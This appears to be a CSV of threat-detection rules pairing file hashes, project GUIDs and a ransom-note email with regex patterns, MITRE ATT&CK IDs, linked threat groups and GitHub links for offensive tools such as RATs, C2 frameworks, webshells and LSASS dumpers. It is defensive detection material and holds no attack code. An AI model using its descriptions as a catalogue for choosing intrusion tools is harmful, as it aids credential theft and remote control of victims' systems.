"*8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911*",".{0,1000}8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30987"
"*8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911*",".{0,1000}8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30988"
"*8fa8dcae188d04bb3bb48782d5f97019c3a122816d9f48a6a8554ce211acb1f8*",".{0,1000}8fa8dcae188d04bb3bb48782d5f97019c3a122816d9f48a6a8554ce211acb1f8.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","#filehash","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","30989"
"*8faee6fcefcca679fe3777b211a7a6ec5f9df13272dce5a138a2517937109295*",".{0,1000}8faee6fcefcca679fe3777b211a7a6ec5f9df13272dce5a138a2517937109295.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30991"
"*8FC203AA-8A90-4A15-B823-E2C3BC4DF0D6*",".{0,1000}8FC203AA\-8A90\-4A15\-B823\-E2C3BC4DF0D6.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#GUIDProject","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","30993"
"*8fc21bc6c4a11583b4db44e3dad0980bdb5c7ace*",".{0,1000}8fc21bc6c4a11583b4db44e3dad0980bdb5c7ace.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","30994"
"*8fc2d1718acdfb83bf620dea1f87f053ad99f609b9881afe70913c6284543223*",".{0,1000}8fc2d1718acdfb83bf620dea1f87f053ad99f609b9881afe70913c6284543223.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30995"
"*8fc36834909b236d10cf316bb5c265745c022e94708b8d759c6d20ee25c3e436*",".{0,1000}8fc36834909b236d10cf316bb5c265745c022e94708b8d759c6d20ee25c3e436.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","30996"
"*8fc36834909b236d10cf316bb5c265745c022e94708b8d759c6d20ee25c3e436*",".{0,1000}8fc36834909b236d10cf316bb5c265745c022e94708b8d759c6d20ee25c3e436.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","30997"
"*8fc8b333eff4c9c189b5843e20e749cb0b67cba23f8ab993cc162d4c8865ae4c*",".{0,1000}8fc8b333eff4c9c189b5843e20e749cb0b67cba23f8ab993cc162d4c8865ae4c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30998"
"*8fcb35dfb7c7decc047cc08442a59f92aad7eef538a1c46e7989240bdb17037a*",".{0,1000}8fcb35dfb7c7decc047cc08442a59f92aad7eef538a1c46e7989240bdb17037a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31000"
"*8fdae5b4490183c9057a684f0ac2f82dd5c8911cb2f43a54ff47a9ad6e93952a*",".{0,1000}8fdae5b4490183c9057a684f0ac2f82dd5c8911cb2f43a54ff47a9ad6e93952a.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","31003"
"*8ff9a955c42b825da52cbc493b836da8604b30abe8ee2fd81f2954066b16ad4f*",".{0,1000}8ff9a955c42b825da52cbc493b836da8604b30abe8ee2fd81f2954066b16ad4f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31005"
"*8fff8971be038906411561230e11adae6f576dca6761375cbcf61d3e7b2e4cd4*",".{0,1000}8fff8971be038906411561230e11adae6f576dca6761375cbcf61d3e7b2e4cd4.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","#filehash","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","31006"
"*8filesback@onionmail.org*",".{0,1000}8filesback\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","31007"
"*90023e0492635199b386d05e8bffdb806f0cc6a6d0e6a2dbc9a58867d002b566*",".{0,1000}90023e0492635199b386d05e8bffdb806f0cc6a6d0e6a2dbc9a58867d002b566.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31008"
"*900b0066aed8e2c6c6c59122831b0e7ee4ea0328a5f8cd7a5bff739ef9cdb366*",".{0,1000}900b0066aed8e2c6c6c59122831b0e7ee4ea0328a5f8cd7a5bff739ef9cdb366.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31009"
"*900d1ae66a883c047dbe402f9d11c14962173279c8e617ced5508da39037ffa5*",".{0,1000}900d1ae66a883c047dbe402f9d11c14962173279c8e617ced5508da39037ffa5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","31010"
"*901E099B-A01A-4F21-9A6F-8D3B60F04168*",".{0,1000}901E099B\-A01A\-4F21\-9A6F\-8D3B60F04168.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","31012"
"*901e877ce39c5b9a7f35c58b30a6d1be15c94f44b0d1ae84007c59d7a11011a2*",".{0,1000}901e877ce39c5b9a7f35c58b30a6d1be15c94f44b0d1ae84007c59d7a11011a2.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","31013"
"*90229D7D-5CC2-4C1E-80D3-4B7C7289B480*",".{0,1000}90229D7D\-5CC2\-4C1E\-80D3\-4B7C7289B480.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#GUIDproject","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","31014"
"*902337b62862f99bbf97131701eaab2be82fd5a84b7d379cec0acff56a2bf670*",".{0,1000}902337b62862f99bbf97131701eaab2be82fd5a84b7d379cec0acff56a2bf670.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","31015"
"*9027a0ddabd5e6267e365572f404e2f0019a02d3f91f8434ca674765c46f4f22*",".{0,1000}9027a0ddabd5e6267e365572f404e2f0019a02d3f91f8434ca674765c46f4f22.{0,1000}","offensive_tool_keyword","PrivFu","perform S4U logon with SeTcbPrivilege","T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","S4uDelegator","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","31016"
"*90286bcf91af16552af2fb7aab0007d06a48493bdd2cb3b7367c7e540f70596b*",".{0,1000}90286bcf91af16552af2fb7aab0007d06a48493bdd2cb3b7367c7e540f70596b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31017"
"*902b3361a8df50b70a7c9b88aa728fe9d5092f2dc3d8d6691da4a3bcd4a4d56e*",".{0,1000}902b3361a8df50b70a7c9b88aa728fe9d5092f2dc3d8d6691da4a3bcd4a4d56e.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","31018"
"*902d0c9bf021c0320c144524268e05f889f733e07b76c24ebdda299e0508239a*",".{0,1000}902d0c9bf021c0320c144524268e05f889f733e07b76c24ebdda299e0508239a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31019"
"*9036e04e3c1caa4b91d008a010df98e93449cfcd1ace8922d96883bd1587764c*",".{0,1000}9036e04e3c1caa4b91d008a010df98e93449cfcd1ace8922d96883bd1587764c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31021"
"*9037b5197eeeb068f24a73f9ac99320e0aeed9a91a69f18eec013c689be871bb*",".{0,1000}9037b5197eeeb068f24a73f9ac99320e0aeed9a91a69f18eec013c689be871bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31022"
"*903d7db4500738baf1e30f3923909fda0df637ca2fd904a6e67565f72925f613*",".{0,1000}903d7db4500738baf1e30f3923909fda0df637ca2fd904a6e67565f72925f613.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31023"
"*903fa9aeb7419d81f75d5a5a226623c5ec63a52b6da020135b864cd7d92284c9*",".{0,1000}903fa9aeb7419d81f75d5a5a226623c5ec63a52b6da020135b864cd7d92284c9.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#filehash","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","31024"
"*9042B543-13D1-42B3-A5B6-5CC9AD55E150*",".{0,1000}9042B543\-13D1\-42B3\-A5B6\-5CC9AD55E150.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","31025"
"*90487bd2731d62d51c5bda9ea313fe915fb6ce31fc2c5f54622d780d924da26e*",".{0,1000}90487bd2731d62d51c5bda9ea313fe915fb6ce31fc2c5f54622d780d924da26e.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","31027"
"*904A001AD82F09CD0CB1E1945B29F9120BEB603F7D116BD27A18E6A74DB6B53A*",".{0,1000}904A001AD82F09CD0CB1E1945B29F9120BEB603F7D116BD27A18E6A74DB6B53A.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31028"
"*904b042e2ec7aa85331911b1343213292e061dcc4f2010d01f4f7b60f0198b10*",".{0,1000}904b042e2ec7aa85331911b1343213292e061dcc4f2010d01f4f7b60f0198b10.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","31029"
"*906397a1765b82510679cb5b0f26ef1c8c89335c68f1d17178f924e5b2544454*",".{0,1000}906397a1765b82510679cb5b0f26ef1c8c89335c68f1d17178f924e5b2544454.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","31037"
"*9065655de782c08c41aa0fe11503e92e455fdf4b1a590101221aeb73f8db98e9*",".{0,1000}9065655de782c08c41aa0fe11503e92e455fdf4b1a590101221aeb73f8db98e9.{0,1000}","offensive_tool_keyword","SessionExec","Execute commands in other Sessions","T1053 - T1569","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/SessionExec","1","0","#filehash","N/A","10","1","86","14","2024-07-29T12:24:28Z","2024-07-21T15:32:07Z","31038"
"*906a7f9794d035af75552674eaa775b1584a129d1cd16d49c15bb5aa8032661a*",".{0,1000}906a7f9794d035af75552674eaa775b1584a129d1cd16d49c15bb5aa8032661a.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","31039"
"*906f3fb4de41cebd2db7a804487066933147df6604e1e9036890dd5b90eb9a9d*",".{0,1000}906f3fb4de41cebd2db7a804487066933147df6604e1e9036890dd5b90eb9a9d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31042"
"*9078149dc6ee62aea91749ba2db9aba15c9518f92bfe709b3bba8523f92cd2e8*",".{0,1000}9078149dc6ee62aea91749ba2db9aba15c9518f92bfe709b3bba8523f92cd2e8.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","0","#filehash","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","31043"
"*9078149dc6ee62aea91749ba2db9aba15c9518f92bfe709b3bba8523f92cd2e8*",".{0,1000}9078149dc6ee62aea91749ba2db9aba15c9518f92bfe709b3bba8523f92cd2e8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31044"
"*908524e7f57ba214a071d8388eb4b1b375d87aade0833e39f1ac12b3660fcb9a*",".{0,1000}908524e7f57ba214a071d8388eb4b1b375d87aade0833e39f1ac12b3660fcb9a.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","31048"
"*90873c2ac02c860b3b6ec7cf262ab58504ff187dd9e638bbabef94e985607836*",".{0,1000}90873c2ac02c860b3b6ec7cf262ab58504ff187dd9e638bbabef94e985607836.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#filehash #linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","31049"
"*908aaf0590fc3e75a3776ad913ae14c3f328057b8ac0f4135bd1f324a7c1913c*",".{0,1000}908aaf0590fc3e75a3776ad913ae14c3f328057b8ac0f4135bd1f324a7c1913c.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","31050"
"*9092d0cccf0f55b0e680d64f23e6c2cc6e406ab4e05d54aeafe73e9a9943b739*",".{0,1000}9092d0cccf0f55b0e680d64f23e6c2cc6e406ab4e05d54aeafe73e9a9943b739.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","31052"
"*9092e23d27fe808acb7485c1cabd30ce0eb89cbdce51da83725668b4305ad2eb*",".{0,1000}9092e23d27fe808acb7485c1cabd30ce0eb89cbdce51da83725668b4305ad2eb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31053"
"*9093453fbce7f48351fa3e6f57793f3dd20737780eb95d25c0b1643d372180f8*",".{0,1000}9093453fbce7f48351fa3e6f57793f3dd20737780eb95d25c0b1643d372180f8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31054"
